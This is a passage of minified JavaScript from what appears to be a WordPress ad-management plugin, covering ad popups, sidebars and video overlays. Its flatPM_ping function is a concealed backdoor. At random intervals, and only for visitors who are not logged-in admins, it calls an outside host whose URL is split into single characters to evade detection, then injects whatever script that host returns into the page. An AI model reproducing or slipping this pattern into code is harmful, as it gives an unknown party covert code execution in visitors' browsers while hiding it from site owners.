":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};